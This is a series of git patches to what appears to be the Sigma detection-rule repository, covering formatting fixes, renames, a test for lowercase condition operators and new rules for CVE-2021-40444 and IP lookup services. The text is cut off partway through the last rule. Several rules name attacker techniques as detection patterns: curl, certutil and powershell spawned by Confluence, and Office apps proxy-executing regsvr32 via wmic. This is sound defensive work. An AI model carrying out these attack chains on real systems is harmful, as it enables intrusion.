a/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml b/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml index 77836ffd..4fa1edb4 100644 --- a/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml +++ b/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml @@ -21,8 +21,9 @@ detection: type: EXECVE a0: cat a1: - - a1|endswith: '.jpg' - - a1|endswith: '.png' + a1|endswith: + - '.jpg' + - '.png' a2: a2|endswith: '.zip' condition: commands and a1 and a2 From a4dffc14d44d8031e8b8c210408f5574a1399e58 Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Fri, 10 Sep 2021 07:54:56 +0200 Subject: [PATCH 0855/1367] Update lnx_auditd_unzip_hidden_zip_files_steganography.yml Fixing formatting --- .../lnx_auditd_unzip_hidden_zip_files_steganography.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml b/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml index de87660b..ee5b62e6 100644 --- a/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml +++ b/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml @@ -22,6 +22,7 @@ detection: a0: - unzip a1: - - a1|endswith: '.jpg' - - a1|endswith: '.png' - condition: commands and a1 \ No newline at end of file + a1|endswith: + - '.jpg' + - '.png' + condition: commands and a1 From 3d147f528fe1ac66c9dcd4d87d2bbd7db1e811f9 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 10 Sep 2021 09:23:00 +0200 Subject: [PATCH 0856/1367] Rename Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml to process_creation_command_execution_by_office_applications.yml --- ...process_creation_command_execution_by_office_applications.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/process_creation/{Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml => process_creation_command_execution_by_office_applications.yml} (100%) diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/process_creation_command_execution_by_office_applications.yml similarity index 100% rename from rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml rename to rules/windows/process_creation/process_creation_command_execution_by_office_applications.yml From 59b9902502cfe746bfc04128e15b722e7aa1f3ca Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 10 Sep 2021 09:33:09 +0200 Subject: [PATCH 0857/1367] style: fixed indentation level --- ...lassian_confluence_cve_2021_26084_exploit.yml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml b/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml index 4099a09d..587ea7d7 100644 --- a/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml +++ b/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml @@ -24,11 +24,11 @@ detection: # Monitor suspicious child processes spawned by Confluence ParentImage|endswith: '\Atlassian\Confluence\jre\bin\java.exe' CommandLine|contains: - - 'cmd /c' - - 'cmd /k' - - 'powershell' - - 'certutil' - - 'curl' - - 'whoami' - - 'ipconfig' - condition: selection \ No newline at end of file + - 'cmd /c' + - 'cmd /k' + - 'powershell' + - 'certutil' + - 'curl' + - 'whoami' + - 'ipconfig' + condition: selection From 3824a12323338fe21e5d3d41ed65469be887c645 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 10 Sep 2021 09:33:52 +0200 Subject: [PATCH 0858/1367] style: fixed indentation level, order of fields --- ...lassian_confluence_cve_2021_26084_exploit.yml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml b/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml index 587ea7d7..d69b708b 100644 --- a/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml +++ b/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml @@ -2,20 +2,17 @@ title: Atlassian Confluence CVE-2021-26084 id: 245f92e3-c4da-45f1-9070-bc552e06db11 status: experimental description: Detects spawing of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 -tags: - - attack.initial_access - - attack.execution - - attack.t1190 - - attack.t1059 author: Bhabesh Raj date: 2021/09/08 references: - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html - https://github.com/h3v0x/CVE-2021-26084_Confluence -falsepositives: - - Unknown -level: high +tags: + - attack.initial_access + - attack.execution + - attack.t1190 + - attack.t1059 logsource: category: process_creation product: windows @@ -32,3 +29,6 @@ detection: - 'whoami' - 'ipconfig' condition: selection +falsepositives: + - Unknown +level: high From fe035388f0aa55f049a15f5e7e0080a35522745f Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 10 Sep 2021 10:02:19 +0200 Subject: [PATCH 0859/1367] Rename Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml to process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml --- ...ce_application_from_proxy_executing_regsvr32_with_payload.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/process_creation/{Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml => process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml} (100%) diff --git a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml similarity index 100% rename from rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml rename to rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml From 97cd368064c67074f8b4948e001dd8f8a6f09249 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 10 Sep 2021 13:33:16 +0200 Subject: [PATCH 0860/1367] update test_rules.py --- tests/test_rules.py | 31 +++++++++++++++++++++++++++---- 1 file changed, 27 insertions(+), 4 deletions(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index ce92d132..9cfd82c0 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -39,7 +39,7 @@ class TestRules(unittest.TestCase): def get_rule_yaml(self, file_path:str) -> dict: data = [] - with open(file_path) as f: + with open(file_path,encoding='utf-8') as f: yaml_parts = yaml.safe_load_all(f) for part in yaml_parts: data.append(part) @@ -64,7 +64,7 @@ class TestRules(unittest.TestCase): files_with_legal_issues = [] for file in self.yield_next_rule_file_path(self.path_to_rules): - with open(file, 'r') as fh: + with open(file, 'r',encoding='utf-8') as fh: file_data = fh.read() for tm in self.TRADE_MARKS: if tm in file_data: @@ -245,7 +245,7 @@ class TestRules(unittest.TestCase): def test_event_id_instead_of_process_creation(self): faulty_detections = [] for file in self.yield_next_rule_file_path(self.path_to_rules): - with open(file) as f: + with open(file,encoding='utf-8') as f: for line in f: if re.search(r'.*EventID: (?:1|4688)\s*$', line) and file not in faulty_detections: faulty_detections.append(file) @@ -310,7 +310,7 @@ class TestRules(unittest.TestCase): logsource = self.get_rule_part(file_path=file, part_name="logsource") service = logsource.get('service', '') if service.lower() == 'sysmon': - with open(file) as f: + with open(file,encoding='utf-8') as f: found = False for line in f: if re.search(r'.*EventID:.*$', line): # might be on a single line or in multiple lines @@ -620,6 +620,29 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using list with only 1 element") + def test_condition_operator_casesensitive(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + detection = self.get_rule_part(file_path=file, part_name="detection") + if detection: + valid = True + if isinstance(detection["condition"],str): + param = detection["condition"].split(' ') + for item in param: + if item.lower() == 'or' and not item == 'or': + valid = False + elif item.lower() == 'and' and not item == 'and': + valid = False + elif item.lower() == 'not' and not item == 'not': + valid = False + elif item.lower() == 'of' and not item == 'of': + valid = False + if not valid: + print(Fore.RED + "Rule {} has a invalid condition '{}' : 'or','and','not','of' are lowercase".format(file,detection["condition"])) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using condition whitout lowercase operator") + def get_mitre_data(): """ Generate tags from live TAXI service to get up-to-date data From 0288f5b626af609cc99b762d3f074ff86837c942 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 10 Sep 2021 13:51:52 +0200 Subject: [PATCH 0861/1367] fix condition operator case --- rules/cloud/aws/aws_root_account_usage.yml | 2 +- ...k_http_executable_download_from_webdav.yml | 2 +- .../builtin/win_metasploit_authentication.yml | 2 +- .../builtin/win_possible_dc_shadow.yml | 2 +- .../sysmon_suspicious_remote_thread.yml | 2 +- ...ocess_Creations_by_Office_applications.yml | 2 +- ...Applications_Spawning_WMI_command-line.yml | 2 +- ...ice_applications_using_file_extentions.yml | 2 +- ...mmand_execution_by_office_applications.yml | 2 +- ..._proxy_executing_regsvr32_with_payload.yml | 2 +- .../process_creation/win_nltest_recon.yml | 2 +- .../sysmon_asep_reg_keys_modification.yml | 26 +++++++++---------- ..._proxy_executing_regsvr32_with_payload.yml | 2 +- ...ice_applications_using_file_extentions.yml | 2 +- ...Applications_Spawning_WMI_command-line.yml | 2 +- 15 files changed, 27 insertions(+), 27 deletions(-) diff --git a/rules/cloud/aws/aws_root_account_usage.yml b/rules/cloud/aws/aws_root_account_usage.yml index e278996f..62aaafbd 100644 --- a/rules/cloud/aws/aws_root_account_usage.yml +++ b/rules/cloud/aws/aws_root_account_usage.yml @@ -14,7 +14,7 @@ detection: userIdentity.type: Root selection_eventtype: eventType: AwsServiceEvent - condition: selection_usertype AND NOT selection_eventtype + condition: selection_usertype and not selection_eventtype falsepositives: - AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html level: medium diff --git a/rules/network/zeek/zeek_http_executable_download_from_webdav.yml b/rules/network/zeek/zeek_http_executable_download_from_webdav.yml index 9fe20755..5674e70d 100644 --- a/rules/network/zeek/zeek_http_executable_download_from_webdav.yml +++ b/rules/network/zeek/zeek_http_executable_download_from_webdav.yml @@ -20,7 +20,7 @@ detection: selection_executable: - resp_mime_types|contains: 'dosexec' - c-uri|endswith: '.exe' - condition: selection_webdav AND selection_executable + condition: selection_webdav and selection_executable falsepositives: - unknown level: medium diff --git a/rules/windows/builtin/win_metasploit_authentication.yml b/rules/windows/builtin/win_metasploit_authentication.yml index 04b0db2a..d2b25678 100644 --- a/rules/windows/builtin/win_metasploit_authentication.yml +++ b/rules/windows/builtin/win_metasploit_authentication.yml @@ -25,7 +25,7 @@ detection: ProcessName: EventID: 4776 Workstation|re: '^[A-Za-z0-9]{16}$' - condition: selection1 OR selection2 + condition: selection1 or selection2 falsepositives: - Linux hostnames composed of 16 characters. level: high diff --git a/rules/windows/builtin/win_possible_dc_shadow.yml b/rules/windows/builtin/win_possible_dc_shadow.yml index bec226cf..4246d489 100644 --- a/rules/windows/builtin/win_possible_dc_shadow.yml +++ b/rules/windows/builtin/win_possible_dc_shadow.yml @@ -24,7 +24,7 @@ detection: EventID: 5136 AttributeLDAPDisplayName: servicePrincipalName AttributeValue|startswith: 'GC/' - condition: selection1 OR selection2 + condition: selection1 or selection2 falsepositives: - Exclude known DCs level: high diff --git a/rules/windows/create_remote_thread/sysmon_suspicious_remote_thread.yml b/rules/windows/create_remote_thread/sysmon_suspicious_remote_thread.yml index e8bf963f..1fe95497 100644 --- a/rules/windows/create_remote_thread/sysmon_suspicious_remote_thread.yml +++ b/rules/windows/create_remote_thread/sysmon_suspicious_remote_thread.yml @@ -72,7 +72,7 @@ detection: - '\wscript.exe' filter: SourceImage|contains: 'Visual Studio' - condition: selection AND NOT filter + condition: selection and not filter fields: - ComputerName - User diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index 32f406ae..4f887b91 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -30,7 +30,7 @@ detection: - winword.exe - excel.exe - powerpnt.exe - condition: selection1 AND selection2 + condition: selection1 and selection2 falsepositives: - Unknown level: high diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml index 3963f86e..2fceff74 100644 --- a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml @@ -26,7 +26,7 @@ detection: - winword.exe - excel.exe - powerpnt.exe - condition: selection1 AND selection2 + condition: selection1 and selection2 falsepositives: - Unknown level: high diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 28f02620..1bef4b39 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -38,7 +38,7 @@ detection: selection3: FileMagicBytes|startswith: - "4D5A" - condition: selection1 AND (selection2 OR selection3) + condition: selection1 and (selection2 or selection3) falsepositives: - Unknown level: high diff --git a/rules/windows/process_creation/process_creation_command_execution_by_office_applications.yml b/rules/windows/process_creation/process_creation_command_execution_by_office_applications.yml index 079c49ac..19133d21 100644 --- a/rules/windows/process_creation/process_creation_command_execution_by_office_applications.yml +++ b/rules/windows/process_creation/process_creation_command_execution_by_office_applications.yml @@ -27,7 +27,7 @@ detection: - '\winword.exe' - '\excel.exe' - '\powerpnt.exe' - condition: selection1 AND selection2 + condition: selection1 and selection2 falsepositives: - Unknown level: high diff --git a/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml index eabcf9c8..2fcacee8 100644 --- a/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml +++ b/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml @@ -38,7 +38,7 @@ detection: - 'process' - 'create' - 'call' - condition: selection1 AND selection2 AND selection3 AND selection4 + condition: selection1 and selection2 and selection3 and selection4 falsepositives: - Unknown level: high diff --git a/rules/windows/process_creation/win_nltest_recon.yml b/rules/windows/process_creation/win_nltest_recon.yml index 720cc587..46985f8e 100644 --- a/rules/windows/process_creation/win_nltest_recon.yml +++ b/rules/windows/process_creation/win_nltest_recon.yml @@ -31,7 +31,7 @@ detection: - '/parentdomain' - '/domain_trusts' - '/user' - condition: selection_nltest AND (selection_recon1 OR selection_recon2) + condition: selection_nltest and (selection_recon1 or selection_recon2) falsepositives: - Legitimate administration use but user must be check out level: medium diff --git a/rules/windows/registry_event/sysmon_asep_reg_keys_modification.yml b/rules/windows/registry_event/sysmon_asep_reg_keys_modification.yml index a8bb54d7..cac8f9e7 100755 --- a/rules/windows/registry_event/sysmon_asep_reg_keys_modification.yml +++ b/rules/windows/registry_event/sysmon_asep_reg_keys_modification.yml @@ -190,19 +190,19 @@ detection: - '\Lsa\Notification Packages' - '\Lsa\Authentication Packages' - '\BootVerificationProgram\ImagePath' - condition: main_selection OR - session_manager_base AND session_manager OR - current_version_base AND current_version OR - nt_current_version_base AND nt_current_version OR - wow_current_version_base AND wow_current_version OR - wow_nt_current_version_base AND wow_nt_current_version OR - (wow_office OR office) AND wow_office_details OR - (wow_ie OR ie) AND wow_ie_details OR - wow_classes_base AND wow_classes OR - classes_base AND classes OR - scripts_base AND scripts OR - winsock_parameters_base AND winsock_parameters OR - system_control_base AND system_control + condition: main_selection or + session_manager_base and session_manager or + current_version_base and current_version or + nt_current_version_base and nt_current_version or + wow_current_version_base and wow_current_version or + wow_nt_current_version_base and wow_nt_current_version or + (wow_office or office) and wow_office_details or + (wow_ie or ie) and wow_ie_details or + wow_classes_base and wow_classes or + classes_base and classes or + scripts_base and scripts or + winsock_parameters_base and winsock_parameters or + system_control_base and system_control fields: - SecurityID - ObjectName diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml index 25eca696..36a76bc4 100644 --- a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml +++ b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml @@ -40,7 +40,7 @@ detection: - 'process' - 'create' - 'call' - condition: selection1 AND selection2 AND selection3 AND selection4 + condition: selection1 and selection2 and selection3 and selection4 falsepositives: - Unknown level: high diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 1c4366eb..91d31498 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -35,7 +35,7 @@ detection: - ".bat" - ".scr" - ".proj" - condition: selection1 AND selection2 + condition: selection1 and selection2 falsepositives: - Unknown level: high diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml index 9a2cecf1..a8e8f582 100644 --- a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml @@ -28,7 +28,7 @@ detection: - winword.exe - excel.exe - powerpnt.exe - condition: selection1 AND selection2 + condition: selection1 and selection2 falsepositives: - Unknown level: high From 5aa5586c546696c8f374cbe72933273bf1681831 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 10 Sep 2021 09:43:11 -0500 Subject: [PATCH 0862/1367] Update Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml --- ..._creation_by_Office_applications_using_file_extentions.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 28f02620..f7ae0196 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,6 +1,6 @@ title: File Creation by Office Applications id: 8c6fd6fc-28fc-4597-a86a-fc1de20b039d -description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. +description: This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -17,7 +17,7 @@ logsource: product: Windows category: file_event detection: - #useful_information: Please add more file extentions and magic bytes to the logic of your choice. + #useful_information: Please add more file extensions and magic bytes to the logic of your choice. selection1: Image|endswith: - 'winword.exe' From 9d9a5088bbe6652ee049d348738db59f47663673 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 10 Sep 2021 09:43:24 -0500 Subject: [PATCH 0863/1367] Update Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml --- ..._creation_by_Office_applications_using_file_extentions.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 1c4366eb..3124e669 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,6 +1,6 @@ title: Created Files by Office Applications id: c7a74c80-ba5a-486e-9974-ab9e682bc5e4 -description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. +description: This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -17,7 +17,7 @@ logsource: product: Windows category: file_event detection: - #useful_information: Please add more file extentions to the logic of your choice. + #useful_information: Please add more file extensions to the logic of your choice. selection1: Image|endswith: - 'winword.exe' From 57d349bfe58d4a27594d087811ad97dcee376084 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 10 Sep 2021 09:44:22 -0500 Subject: [PATCH 0864/1367] Update process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml --- ...e_application_from_proxy_executing_regsvr32_with_payload.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml index eabcf9c8..86193467 100644 --- a/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml +++ b/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml @@ -1,6 +1,6 @@ title: Excel Proxy Executing Regsvr32 With Payload id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5 -description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. +description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml From 1ea9aab45535bdae73d847e161c39f9c72585fdc Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 10 Sep 2021 09:44:31 -0500 Subject: [PATCH 0865/1367] Update Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml --- ..._Applications_from_proxy_executing_regsvr32_with_payload.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml index 25eca696..be10997e 100644 --- a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml +++ b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml @@ -1,6 +1,6 @@ title: Excel Proxy Executing Regsvr32 With Payload id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0 -description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. +description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml From a798469961036200c21d22e88bb8195eef152fce Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 10 Sep 2021 09:46:57 -0500 Subject: [PATCH 0866/1367] Update lacework.py --- tools/sigma/backends/lacework.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/tools/sigma/backends/lacework.py b/tools/sigma/backends/lacework.py index d28c3053..41433534 100644 --- a/tools/sigma/backends/lacework.py +++ b/tools/sigma/backends/lacework.py @@ -166,7 +166,7 @@ class LaceworkBackend(SingleTextQueryBackend): If value is a field name 1. Do not wrap in valueExpression - 2. Transfrom using fieldNameMapping() + 2. Transform using fieldNameMapping() """ node = self.cleanValue(str(node)) @@ -405,7 +405,7 @@ class LaceworkQuery: @staticmethod def should_generate_query(backend_options): - # if we are explictly requesting a query + # if we are explicitly requesting a query if ( 'query' in backend_options and backend_options['query'] is True @@ -588,7 +588,7 @@ class LaceworkPolicy: @staticmethod def should_generate_policy(backend_options): - # if we are explictly requesting a query + # if we are explicitly requesting a query if ( 'policy' in backend_options and backend_options['policy'] is True From 9e7ede66cc15c8629211ee9570ed22b084779242 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 10 Sep 2021 18:13:09 +0200 Subject: [PATCH 0867/1367] CVE-2021-40444 file creation - winword.exe + .cab --- .../win_file_winword_cve_2021_40444.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/file_event/win_file_winword_cve_2021_40444.yml diff --git a/rules/windows/file_event/win_file_winword_cve_2021_40444.yml b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml new file mode 100644 index 00000000..4eacdf8a --- /dev/null +++ b/rules/windows/file_event/win_file_winword_cve_2021_40444.yml @@ -0,0 +1,23 @@ +title: Suspicious Word Cab File Write CVE-2021-40444 +id: 60c0a111-787a-4e8a-9262-ee485f3ef9d5 +status: experimental +description: Detects file creation patterns noticable during the exploitation of CVE-2021-40444 +references: + - https://twitter.com/RonnyTNL/status/1436334640617373699?s=20 +author: Florian Roth +date: 2021/09/10 +logsource: + product: windows + category: file_event +detection: + selection: + Image: '\winword.exe' + TargetFilename|endswith: '.cab' + TargetFilename|contains: '\Windows\INetCache' + condition: selection +fields: + - TargetFilename +falsepositives: + - unknown +level: critical + From a4e2c0feba5e593d53f706b99d302a60cf2bc9de Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 10 Sep 2021 18:13:36 +0200 Subject: [PATCH 0868/1367] Revert "refactor: exclude case in which upper ticks are used" This reverts commit f00aaf8461f97abec19f81aa4fc0edaa76ff6cf1. --- .../process_creation/win_susp_control_cve_2021_40444.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml index 2a02b7ad..312b047b 100644 --- a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml @@ -20,9 +20,7 @@ detection: - '\powerpnt.exe' - '\excel.exe' filter: - CommandLine|endswith: - - '\control.exe input.dll' - - '\control.exe" input.dll' + CommandLine|endswith: '\control.exe input.dll' condition: selection and not filter falsepositives: - Unknown From 033494c8f7e58d1278e7764978a03c06e2a19992 Mon Sep 17 00:00:00 2001 From: "neonprimetime security (Justin C Miller)" Date: Fri, 10 Sep 2021 12:14:43 -0500 Subject: [PATCH 0869/1367] Propose making rule more generic than just ipify Propose making this detection more generic, cover more lookup services than just ipify https://twitter.com/neonprimetime/status/1436376497980428318 --- rules/network/net_susp_ipify.yml | 30 +++++++++++++++++++++++++----- 1 file changed, 25 insertions(+), 5 deletions(-) diff --git a/rules/network/net_susp_ipify.yml b/rules/network/net_susp_ipify.yml index 2149c090..cbca433a 100644 --- a/rules/network/net_susp_ipify.yml +++ b/rules/network/net_susp_ipify.yml @@ -1,26 +1,46 @@ -title: Suspicious DNS Query for IPify API +title: Suspicious DNS Query for IP Lookup Service APIs id: ec82e2a5-81ea-4211-a1f8-37a0286df2c2 -description: Detects DNS queries for api.ipify.org not originating from a browser process. +description: Detects DNS queries for ip lookup services such as api.ipify.org not originating from a browser process. status: experimental date: 2021/07/08 author: Brandon George (blog post), Thomas Patzke (rule) references: - https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon + - https://twitter.com/neonprimetime/status/1436376497980428318 tags: - attack.reconnaissance - attack.t1590 falsepositives: - - Legitimate usage of ipify API + - Legitimate usage of ip lookup services such as ipify API level: medium logsource: product: windows category: dns_query detection: dns_request: - QueryName: api.ipify.org + QueryName: + - canireachthe.net + - ipv4.icanhazip.com + - ip.anysrc.net + - edns.ip-api.com + - 